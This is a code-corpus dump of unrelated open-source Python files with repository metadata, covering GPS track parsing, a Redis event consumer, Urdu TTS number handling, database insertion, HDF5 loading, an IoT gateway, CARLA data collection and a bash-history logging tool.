] | null | null | null | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
] | null | null | null | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
import datetime
from .geo import utc_to_localtime
import gpxpy
import pynmea2
"""
Methods for parsing gps data from various file format e.g. GPX, NMEA, SRT.
"""
def get_lat_lon_time_from_gpx(gpx_file, local_time=True):
"""
Read location and time stamps from a track in a GPX file.
Returns a list of tuples (time, lat, lon).
GPX stores time in UTC, by default we assume your camera used the local time
and convert accordingly.
"""
with open(gpx_file, "r") as f:
gpx = gpxpy.parse(f)
points = []
if len(gpx.tracks) > 0:
for track in gpx.tracks:
for segment in track.segments:
for point in segment.points:
t = utc_to_localtime(point.time) if local_time else point.time
points.append((t, point.latitude, point.longitude, point.elevation))
if len(gpx.waypoints) > 0:
for point in gpx.waypoints:
t = utc_to_localtime(point.time) if local_time else point.time
points.append((t, point.latitude, point.longitude, point.elevation))
# sort by time just in case
points.sort()
return points
def get_lat_lon_time_from_nmea(nmea_file, local_time=True):
"""
Read location and time stamps from a track in a NMEA file.
Returns a list of tuples (time, lat, lon).
GPX stores time in UTC, by default we assume your camera used the local time
and convert accordingly.
"""
with open(nmea_file, "r") as f:
lines = f.readlines()
lines = [l.rstrip("\n\r") for l in lines]
# Get initial date
for l in lines:
if "GPRMC" in l:
data = pynmea2.parse(l)
date = data.datetime.date()
break
# Parse GPS trace
points = []
for l in lines:
if "GPRMC" in l:
data = pynmea2.parse(l)
date = data.datetime.date()
if "$GPGGA" in l:
data = pynmea2.parse(l)
timestamp = datetime.datetime.combine(date, data.timestamp)
lat, lon, alt = data.latitude, data.longitude, data.altitude
points.append((timestamp, lat, lon, alt))
points.sort()
return points
| 27.6625 | 88 | 0.612743 | 316 | 2,213 | 4.21519 | 0.297468 | 0.027027 | 0.031532 | 0.024775 | 0.554054 | 0.554054 | 0.509009 | 0.509009 | 0.509009 | 0.509009 | 0 | 0.003839 | 0.293719 | 2,213 | 79 | 89 | 28.012658 | 0.848369 | 0.219611 | 0 | 0.463415 | 0 | 0 | 0.013863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.097561 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37795fd108033032ce115714c706b125640ba1c5 | 1,685 | py | Python | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | import logging
import time
import inflection
from .events import Event, RedisEvent
logger = logging.getLogger(__name__)
class EventConsumer(object):
def __init__(self, streams, group, consumer_name, db, consume_from_end=False):
"""
An event consumer
:param streams: List of stream names
:param group: The name of this consumer group
:param consumer_name: The name of this consumer
:param db: A walrus DB object
"""
self.db = db
self.cg = self.db.consumer_group(group, streams, consumer_name)
self.cg.create(mkstream=True)
self.stop = False
if consume_from_end:
self.cg.set_id('$')
def get_events(self, count=1, block=0):
resp = self.cg.read(count, block)
if resp:
for stream, events in resp:
stream = stream.decode('utf-8')
for event_id, event in events:
event_id = event_id.decode('utf-8')
if b'event' not in event:
logger.warning('got malformed event: %s', str(event))
continue
event = event[b'event'].decode('utf-8')
yield Event.deserialize(event, RedisEvent(getattr(self.cg, inflection.underscore(stream)), event_id))
def iter_events(self, count=10, block=None, sleep=0.1):
while True:
if self.stop:
break
num_events = 0
for event in self.get_events(count=count, block=block):
yield event
num_events += 1
if not num_events:
time.sleep(sleep)
| 31.203704 | 121 | 0.563798 | 206 | 1,685 | 4.480583 | 0.354369 | 0.032503 | 0.032503 | 0.028169 | 0.045504 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009964 | 0.344807 | 1,685 | 53 | 122 | 31.792453 | 0.826087 | 0.106231 | 0 | 0 | 0 | 0 | 0.033793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378287ed5b55d57f24765ff2c9e50d71d392d932 | 3,438 | py | Python | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | null | null | null | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | 3 | 2020-06-05T18:09:02.000Z | 2021-06-10T20:06:02.000Z | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | null | null | null | import csv
import re
import collections
from tts.text_processor import RESOURCE_PATH
class GetStringType(object):
"""
Get String type if it is Date, Time, Number
Number formats which are handled are below
1. Date (12.12.12 or 12/12/12 or 12-12-12)
2. Time (12:12:12 or 12:12)
3. Number (12 or 12.12)
"""
def __init__(self, text):
self.text = text
def get_string_type(self):
if bool(self._date_strings()):
return 'Date'
elif bool(self._time_strings()):
return 'Time'
elif bool(self._number_strings()):
return 'Number'
else:
return 'None'
def _get_all_months(self):
mapping_dict = {}
with open(RESOURCE_PATH + '/month.csv', 'rb') as f:
mappings = csv.reader(f)
for row in mappings:
mapping_dict.update({row[0]: row[1]})
return set(mapping_dict.values())
def _date_strings(self):
regex_string = '\d{1,4}[./-]\d{1,4}[./-]\d{1,4}'
regex = re.compile(regex_string)
find_string = regex.findall(self.text)
self.text = re.sub(regex_string, '', self.text)
find_string += self._text_date()
return find_string
def _text_date(self):
all_months = self._get_all_months()
text_dates = []
regex_pattern = '%s \d{4}'
for month in all_months:
comp_regex = regex_pattern % month.decode('utf-8').replace(' ', '')
regex = re.compile(comp_regex)
find_string = regex.findall(self.text)
if bool(find_string):
text_dates += find_string
self.text = re.sub(comp_regex, '', self.text)
return text_dates
def _time_strings(self):
regex_string = '\d{1,2}:\d{1,2}(?::\d{1,2})?'
regex = re.compile(regex_string)
find_string = regex.findall(self.text)
self.text = re.sub(regex_string, '', self.text)
return find_string
def _number_strings(self):
regex = re.compile('(\d+(?:\.\d+)?)')
return regex.findall(self.text)
class NumberStrings(GetStringType):
"""
Get all number strings in a string.
Number formats which are handled are below
1. Date (12.12.12 or 12/12/12 or 12-12-12)
2. Time (12:12:12 or 12:12)
3. Number (12 or 12.12)
"""
def __init__(self, text, all_types=True, date_only=False, time_only=False, number_only=False):
self.text = text
self.all_types = all_types
self.date_only = date_only
self.time_only = time_only
self.number_only = number_only
super(NumberStrings, self).__init__(text)
def get_number_strings(self):
output = collections.OrderedDict()
if self.all_types:
output.update({'date': self._date_strings()})
output.update({'time': self._time_strings()})
output.update({'number': self._number_strings()})
else:
if self.date_only:
output.update({
'date': self._date_strings()
})
if self.time_only:
output.update({
'time': self._time_strings()
})
if self.number_only:
output.update({
'number': self._number_strings()
})
return output
| 30.157895 | 98 | 0.559046 | 436 | 3,438 | 4.188073 | 0.192661 | 0.043812 | 0.026287 | 0.035049 | 0.372399 | 0.372399 | 0.215772 | 0.215772 | 0.215772 | 0.215772 | 0 | 0.03838 | 0.317917 | 3,438 | 113 | 99 | 30.424779 | 0.740299 | 0.111402 | 0 | 0.240506 | 0 | 0 | 0.048813 | 0.019726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113924 | false | 0 | 0.050633 | 0 | 0.316456 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378755b6e4a6d1df5540651db412b6b7152b2607 | 2,055 | py | Python | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | #!/Python27/python
from ..database.database import Database
# A class used for song insertion
class Song:
def __init__(self, title, production_year, cd, singer, composer, song_writer):
self.title = title
self.production_year = production_year
self.cd = cd
self.singer = singer
self.composer = composer
self.song_writer = song_writer
def insert_song(self):
# get a new database connection
connection = Database().start_connection()
try:
# check for empty fields
if(self.title == '' or
self.production_year == '' or
self.cd == '' or
self.singer == '' or
self.composer == '' or
self.song_writer == ''):
raise Exception('Empty Fields')
# insert the song with prepared statement
with connection.cursor() as cursor:
song_query = "INSERT INTO `tragoudi` (`titlos`, `sinthetis`, `etos_par`, `stixourgos`) " \
"VALUES (%s, %s, %s, %s)"
cursor.execute(song_query, (self.title, self.composer, self.production_year, self.song_writer))
sinprod_query = "INSERT INTO `singer_prod` (`cd`, `tragoudistis`, `title`) VALUES (%s, %s, %s)"
cursor.execute(sinprod_query, (self.cd, self.singer, self.title))
# commit database changes
connection.commit()
# return the class for the alert box and the message to be shown
return [
'class="alert alert-success text-center"',
'Song inserted successfully.'
]
except:
# on exception, return the class for the alert box and the message to be shown
return [
'class="alert alert-danger text-center"',
'Song could not be inserted.'
]
finally:
# close the database connection
Database().close_connection(connection)
| 35.431034 | 112 | 0.552798 | 218 | 2,055 | 5.105505 | 0.348624 | 0.040431 | 0.048518 | 0.016173 | 0.156334 | 0.127583 | 0.127583 | 0.127583 | 0.127583 | 0.127583 | 0 | 0.001496 | 0.349392 | 2,055 | 57 | 113 | 36.052632 | 0.830965 | 0.163504 | 0 | 0.054054 | 0 | 0.027027 | 0.18538 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.162162 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378979218302d31b75d0e2659058fd19f5495d01 | 1,237 | py | Python | NeoAnalysis_Py3.5/NeoAnalysis/readio/h5_io.py | Research-lab-KUMS/NeoAnalysis | 32b508dfade3069b1ec5cc7664574b8d3f2d5f57 | [
"MIT"
] | 23 | 2017-09-04T13:20:38.000Z | 2022-03-08T08:15:17.000Z | NeoAnalysis_Py3.5/NeoAnalysis/readio/h5_io.py | Research-lab-KUMS/NeoAnalysis | 32b508dfade3069b1ec5cc7664574b8d3f2d5f57 | [
"MIT"
] | 4 | 2018-01-05T13:44:29.000Z | 2021-09-30T17:08:15.000Z | NeoAnalysis_Py2.7/NeoAnalysis/readio/h5_io.py | neoanalysis/NeoAnalysis | c5f25b71e16997f3a05f70b1eead11f99a3b7e2b | [
"MIT"
] | 5 | 2017-11-26T19:40:46.000Z | 2021-03-11T17:25:23.000Z | import h5py as hp
import numpy as np
import re
def h5_io(filename, spike_to_load, analog_to_load):
spikes = dict()
analogs = dict()
events = dict()
comments = dict()
with hp.File(filename,'r') as f:
for key in f.keys():
if key=='events':
events['times'] = f[key]['times'].value
events['labels'] = f[key]['labels'].value
elif key=='comments':
comments['times'] = f[key]['times'].value
comments['labels'] = f[key]['labels'].value
elif key=='spikes':
for tem_key in f[key].keys():
if tem_key in spike_to_load:
spikes[tem_key] = f[key][tem_key]['times'].value
elif key=='analogs':
for tem_key in f[key].keys():
if tem_key in analog_to_load:
analogs[tem_key] = dict()
analogs[tem_key]['data'] = f[key][tem_key]['data'].value
analogs[tem_key]['sampling_rate'] = f[key][tem_key]['sampling_rate'].value
analogs[tem_key]['start_time'] = f[key][tem_key]['start_time'].value
return events,comments,spikes,analogs | 44.178571 | 98 | 0.514956 | 156 | 1,237 | 3.916667 | 0.25641 | 0.12766 | 0.052373 | 0.065466 | 0.248773 | 0.186579 | 0.186579 | 0.094926 | 0.094926 | 0.094926 | 0 | 0.002454 | 0.341148 | 1,237 | 28 | 99 | 44.178571 | 0.747239 | 0 | 0 | 0.071429 | 0 | 0 | 0.105816 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378a6f60c85208588264fa4b0e5b9304df902135 | 1,601 | py | Python | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | import time
import network_manager
from components import Heartbeat, LogManager
from message_bus import MessageBus
import logger
class Gateway:
def __init__(self):
self._message_bus = MessageBus(self._on_message)
self._components = []
self._component_dict = {}
def add_component(self, component):
self._components.append(component)
self._component_dict[component.id] = component
component.message_bus = self._message_bus
def run(self):
self.add_component(Heartbeat())
self.add_component(LogManager())
network_manager.connect()
self._message_bus.connect()
# report status of all components
self._report_all()
print("A1")
while True:
try:
self._message_bus.service()
for component in self._components:
component.service()
time.sleep(0.01)
except Exception as exc:
logger.log("E6 %s" % exc)
def _on_message(self, component_id, payload):
report_all = component_id == "*" # report only, maybe should be ../$SYS/report-all
is_set = payload is not None
if report_all:
self._report_all()
elif is_set:
component = self._component_dict[component_id]
component.set(payload)
else:
component = self._component_dict[component_id]
component.report_state()
def _report_all(self):
for component in self._components:
component.report_state()
| 28.087719 | 91 | 0.610868 | 175 | 1,601 | 5.297143 | 0.348571 | 0.064725 | 0.06041 | 0.084142 | 0.228695 | 0.228695 | 0.148867 | 0 | 0 | 0 | 0 | 0.0045 | 0.306059 | 1,601 | 56 | 92 | 28.589286 | 0.829883 | 0.049344 | 0 | 0.186047 | 0 | 0 | 0.00527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0 | 0.116279 | 0 | 0.255814 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378b8c1c8a129943980f58b79ee2233ffe6b0bae | 3,439 | py | Python | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 21 | 2022-02-15T10:11:54.000Z | 2022-03-24T17:44:29.000Z | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | null | null | null | haco/DIDrive_core/demo/latent_rl/collect_data.py | decisionforce/HACO | ebd1dc49598e6ae2704e58c053cc35f2d9e28429 | [
"Apache-2.0"
] | 3 | 2022-02-22T11:11:43.000Z | 2022-03-17T17:58:44.000Z | import os
from functools import partial
import numpy as np
from ding.envs import SyncSubprocessEnvManager
from ding.utils.default_helper import deep_merge_dicts
from easydict import EasyDict
from tqdm import tqdm
from haco.DIDrive_core.data import CarlaBenchmarkCollector, BenchmarkDatasetSaver
from haco.DIDrive_core.envs import SimpleCarlaEnv, CarlaEnvWrapper
from haco.DIDrive_core.policy import AutoPIDPolicy
from haco.DIDrive_core.utils.others.tcp_helper import parse_carla_tcp
config = dict(
env=dict(
env_num=5,
simulator=dict(
disable_two_wheels=True,
planner=dict(
type='behavior',
resolution=1,
),
obs=(
dict(
name='birdview',
type='bev',
size=[320, 320],
pixels_per_meter=5,
pixels_ahead_vehicle=100,
),
),
verbose=False,
),
col_is_failure=True,
stuck_is_failure=True,
wrapper=dict(),
manager=dict(
auto_reset=False,
shared_memory=False,
context='spawn',
max_retry=1,
),
),
server=[
dict(carla_host='local_host', carla_ports=[9000, 9010, 2]),
],
policy=dict(
target_speed=25,
noise=False,
collect=dict(
dir_path='bev_train',
n_episode=50,
collector=dict(
suite=['NoCrashTown01-v3', 'NoCrashTown01-v5'],
nocrash=True,
weathers=[1],
),
),
),
)
main_config = EasyDict(config)
def latent_postprocess(observations, *args):
sensor_data = {}
sensor_data['birdview'] = observations['birdview'][..., :7]
others = {}
return sensor_data, others
def wrapped_env(env_cfg, wrapper_cfg, host, port, tm_port=None):
return CarlaEnvWrapper(SimpleCarlaEnv(env_cfg, host, port, tm_port), wrapper_cfg)
def main(cfg, seed=0):
cfg.env.manager = deep_merge_dicts(SyncSubprocessEnvManager.default_config(), cfg.env.manager)
tcp_list = parse_carla_tcp(cfg.server)
env_num = cfg.env.env_num
collector_env = SyncSubprocessEnvManager(
env_fn=[partial(wrapped_env, cfg.env, cfg.env.wrapper, *tcp_list[i]) for i in range(env_num)],
cfg=cfg.env.manager,
)
collector_env.seed(seed)
policy = AutoPIDPolicy(cfg.policy)
collector = CarlaBenchmarkCollector(cfg.policy.collect.collector, collector_env, policy.collect_mode)
if not os.path.exists(cfg.policy.collect.dir_path):
os.makedirs(cfg.policy.collect.dir_path)
collected_episodes = 0
saver = BenchmarkDatasetSaver(cfg.policy.collect.dir_path, cfg.env.simulator.obs, latent_postprocess)
saver.make_dataset_path(cfg.policy.collect)
while collected_episodes < cfg.policy.collect.n_episode:
# Sampling data from environments
n_episode = min(cfg.policy.collect.n_episode - collected_episodes, env_num * 2)
new_data = collector.collect(n_episode=n_episode)
saver.save_episodes_data(new_data, start_episode=collected_episodes)
del new_data
collected_episodes += n_episode
print('[MAIN] Current collected: ', collected_episodes, '/', cfg.policy.collect.n_episode)
collector_env.close()
if __name__ == '__main__':
main(main_config)
| 30.433628 | 105 | 0.639139 | 396 | 3,439 | 5.310606 | 0.363636 | 0.038516 | 0.060865 | 0.036139 | 0.099382 | 0.038992 | 0.038992 | 0 | 0 | 0 | 0 | 0.014596 | 0.262867 | 3,439 | 112 | 106 | 30.705357 | 0.81499 | 0.009014 | 0 | 0.097826 | 0 | 0 | 0.036994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.119565 | 0.01087 | 0.173913 | 0.01087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378fb80fb53ae0d7cd227f1351a2926e938d591b | 25,206 | py | Python | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | recent2.py | hongyi-zhao/recent2 | 5b072ff5d6419c444bb013b88e5e2a4de19b0851 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#https://github.com/kislyuk/argcomplete#synopsis
import argcomplete
import argparse
import hashlib
import json
import os
import re
import socket
import sqlite3
import sys
import time
from pathlib import Path
from tabulate import tabulate
from datetime import datetime
# pip install python-dateutil
from dateutil import tz
recent_db = os.getenv('RECENT_DB', os.environ['HOME'] + '/.recent.db')
EXPECTED_PROMPT = 'log-recent -r $__bp_last_ret_value -c "$(HISTTIMEFORMAT= history 1)" -p $$'
class Term:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
LIGHTCYAN = '\033[1;36m'
LIGHTGRAY = '\033[0;37m'
YELLOW = '\033[0;33m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class DB:
SCHEMA_VERSION = 2
CASE_ON = "PRAGMA case_sensitive_like = true"
GET_COMMANDS_TABLE_SCHEMA = """
select sql
from sqlite_master
where type = 'table' and name = 'commands'"""
# NOTE(dotslash): I haven't found a way to send json using ?s. So doing with string formats.
INSERT_ROW = """
insert into commands
(command_dt,command,pid,return_val,pwd,session,json_data)
values (
datetime(?, 'unixepoch'), -- command_dt
?, -- command
?, -- pid
?, -- return_val
?, -- pwd
?, -- session
{} -- json_data
)"""
INSERT_ROW_NO_JSON = """
insert into commands
(command_dt,command,pid,return_val,pwd,session,json_data)
values (
datetime(?, 'unixepoch'), -- command_dt
?, -- command
?, -- pid
?, -- return_val
?, -- pwd
?, -- session
null -- json_data
)"""
INSERT_SESSION = """
insert into sessions
(created_dt, updated_dt, term, hostname, user, sequence, session)
values (
datetime('now','localtime'), datetime('now','localtime'), -- created_dt, updated_dt
?, -- term
?, -- hostname
?, -- user
?, -- sequence
? -- session
)"""
UPDATE_SESSION = """
update sessions
set updated_dt = datetime('now','localtime'), sequence = ?
where session = ?"""
# TAIL_N_ROWS's columns (column order is same as TAIL_N_ROWS
TAIL_N_ROWS_COLUMNS = 'command_dt,command,pid,return_val,pwd,session,json_data'.split(',')
TAIL_N_ROWS_DEDUP_COLUMNS = 'command_dt,command'.split(',')
TAIL_N_ROWS_TEMPLATE = """
select command_dt,command,pid,return_val,pwd,session,json_data
from (
select *
from commands
where
order by command_dt desc limit ?
)
order by command_dt"""
TAIL_N_ROWS_TEMPLATE_DEDUP = """
select *
from (
select max(command_dt) as command_dt, command
from commands
where
group by command
order by command_dt desc limit ?
)
order by command_dt"""
GET_SESSION_SEQUENCE = """select sequence from sessions where session = ?"""
# Setup: Create tables.
CREATE_COMMANDS_TABLE = """
create table if not exists commands (
command_dt timestamp,
command text,
pid int,
return_val int,
pwd text,
session text,
json_data json
)"""
CREATE_SESSIONS_TABLE = """
create table if not exists sessions (
session text primary key not null,
created_dt timestamp,
updated_dt timestamp,
term text,
hostname text,
user text,
sequence int
)"""
CREATE_DATE_INDEX = """
create index if not exists command_dt_ind
on commands (command_dt)"""
# Schema version
GET_SCHEMA_VERSION = """pragma user_version"""
UPDATE_SCHEMA_VERSION = """pragma user_version = """
# Migrate from v1 to v2.
MIGRATE_1_2 = "alter table commands add column json_data json"
class Session:
@classmethod
def session_id_string(cls, pid=None):
# TODO(sai): Should this always be ppid?
pid = pid or os.getppid()
# This combination of ENV vars *should* provide a unique session
# TERM_SESSION_ID for OS X Terminal
# XTERM for xterm
# TMUX, TMUX_PANE for tmux
# STY for GNU screen
# SHLVL handles nested shells
seed = "{}-{}-{}-{}-{}-{}-{}".format(
os.getenv('TERM_SESSION_ID', ''),
os.getenv('WINDOWID', ''),
os.getenv('SHLVL', ''),
os.getenv('TMUX', ''),
os.getenv('TMUX_PANE', ''),
os.getenv('STY', ''),
pid,
) # yapf: disable
return hashlib.md5(seed.encode('utf-8')).hexdigest()
def __init__(self, pid, sequence):
self.sequence = sequence
self.empty = False
self.id = Session.session_id_string(pid)
def update(self, conn):
c = conn.cursor()
try:
term = os.getenv('TERM', '')
hostname = socket.gethostname()
user = os.getenv('USER', '')
c.execute(DB.INSERT_SESSION, [term, hostname, user, self.sequence, self.id])
self.empty = True
except sqlite3.IntegrityError:
# Carriage returns need to be ignored
expected_sequence = c.execute(DB.GET_SESSION_SEQUENCE, [self.id]).fetchone()[0]
if expected_sequence == int(self.sequence):
self.empty = True
c.execute(DB.UPDATE_SESSION, [self.sequence, self.id])
c.close()
def migrate(cur_version, conn):
if cur_version not in (0, 1):
exit(Term.FAIL + ('recent: your command history database does not '
'match recent, please update') + Term.ENDC)
c = conn.cursor()
if cur_version == 1:
# Schema version is v1. Migrate to v2.
print(Term.WARNING + 'recent: migrating schema to version {}'.format(DB.SCHEMA_VERSION) +
Term.ENDC)
c.execute(DB.MIGRATE_1_2)
else:
print(Term.WARNING + 'recent: building schema' + Term.ENDC)
c.execute(DB.CREATE_COMMANDS_TABLE)
c.execute(DB.CREATE_SESSIONS_TABLE)
c.execute(DB.CREATE_DATE_INDEX)
c.execute(DB.UPDATE_SCHEMA_VERSION + str(DB.SCHEMA_VERSION))
conn.commit()
# Parses history command.
# This parse the output of `HISTTIMEFORMAT= history 1`
# Format: optional_whitespace + required_sequence_number + required_whitespace + command
def parse_history(history):
match = re.search(r'^\s*(\d+)\s+(.*)$', history, re.MULTILINE and re.DOTALL)
if match:
sequence, cmd = int(match.group(1)), match.group(2)
# log command discards if the command being logged has a suffix like "my_cmd <ts>"
# If a user copy-pastes recent output, having this timestamp will look weird.
copied_from_recent = \
re.search(r'^(.*)\s+\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$', cmd)
if copied_from_recent:
cmd = copied_from_recent.group(1)
return sequence, cmd
else:
return None, None
def parse_date(date_format):
if re.match(r'^\d{4}$', date_format):
return 'strftime(\'%Y\', command_dt) = ?'
if re.match(r'^\d{4}-\d{2}$', date_format):
return 'strftime(\'%Y-%m\', command_dt) = ?'
if re.match(r'^\d{4}-\d{2}-\d{2}$', date_format):
return 'date(command_dt) = ?'
else:
print("Invalid date passed to -d")
sys.exit(1)
def create_connection():
conn = sqlite3.connect(recent_db, uri=recent_db.startswith("file:"))
build_schema(conn)
return conn
def build_schema(conn):
try:
c = conn.cursor()
current = c.execute(DB.GET_SCHEMA_VERSION).fetchone()[0]
if current != DB.SCHEMA_VERSION:
migrate(current, conn)
except (sqlite3.OperationalError, TypeError):
migrate(0, conn)
def envvars_to_log():
envvar_whitelist = {k.strip() for k in os.getenv('RECENT_ENV_VARS', '').split(',') if k.strip()}
def is_var_interesting(name: str):
# Anything starting with RECENT_ is welcome.
if name.startswith("RECENT_"):
return True
for interesting_var in envvar_whitelist:
# if name matches glob(interesting_var) then we will store it.
# E.g - CONDA_* => we are interested in all env vars that start with CONDA_.
if Path(name).match(interesting_var):
return True
return False
return {k: v for k, v in os.environ.items() if is_var_interesting(k)}
# Entry point to recent-log command.
def log(args_for_test=None):
parser = argparse.ArgumentParser()
parser.add_argument('-r',
'--return_value',
help='Command return value. Set to $?',
default=0,
type=int)
parser.add_argument('-c', '--command', help='Set to $(HISTTIMEFORMAT= history 1)', default='')
parser.add_argument('-p', '--pid', help='Shell pid. Set to $$', default=0, type=int)
args = parser.parse_args(args_for_test)
sequence, command = parse_history(args.command)
pid, return_value = args.pid, args.return_value
pwd = os.getenv('PWD', '')
if not sequence or not command:
print(Term.WARNING + ('recent: cannot parse command output, please check your bash '
'trigger looks like this:') + Term.ENDC)
exit("""export PROMPT_COMMAND='{}'""".format(EXPECTED_PROMPT))
log_command(command=command, pid=pid, sequence=sequence, return_value=return_value, pwd=pwd)
def log_command(command, pid, sequence, return_value, pwd):
conn = create_connection()
session = Session(pid, sequence)
session.update(conn)
if not session.empty:
c = conn.cursor()
json_data = "json('{}')".format(json.dumps({'env': envvars_to_log()}))
# We pass current time instead of using 'now' in sql to mock this value.
c.execute(DB.INSERT_ROW.format(json_data),
[int(time.time()), command, pid, return_value, pwd, session.id])
conn.commit()
conn.close()
# Imports bash_history into RECENT_DB
# Entry point to recent-import-bash-history command.
def import_bash_history_entry_point(args_for_test=None):
description = ('recent-import-bash-history imports bash_history into ~/.recent.db. '
'Run `recent -h` for info about recent command.')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-f',
help='Force import bash history ignoring previous imports',
action='store_true')
args = parser.parse_args(args_for_test)
import_marker = Path(
os.environ.get("RECENT_TEST_IMPORT_FILE", "~/.recent_imported_bash_history"))
import_marker = import_marker.expanduser().absolute()
print(import_marker)
if not args.f and import_marker.exists():
print(Term.FAIL +
'recent-import-bash-history failed: Bash history already imported into ~/.recent.db')
print('Run the command with -f option if you are absolutely sure.' + Term.ENDC)
parser.print_help()
sys.exit(1)
import_bash_history()
import_marker.touch()
def import_bash_history():
# Construct history from bash_history.
# Example bash_history. The history has 3 entries. First entry has no timestamp attached to it.
# The next 2 entries have timestamp attached to them. The last entry has some unknown comment
# which we will ignore.
"""
ls /
#1571012545
echo foo
#1571012560
#useless comment that should be ignored.
cat bar
"""
history = []
# Phase 1 starts: After this phase history will be like this
# [(-1, "ls /"), # This entry has no timestamp.
# (1571012545, "echo foo"),
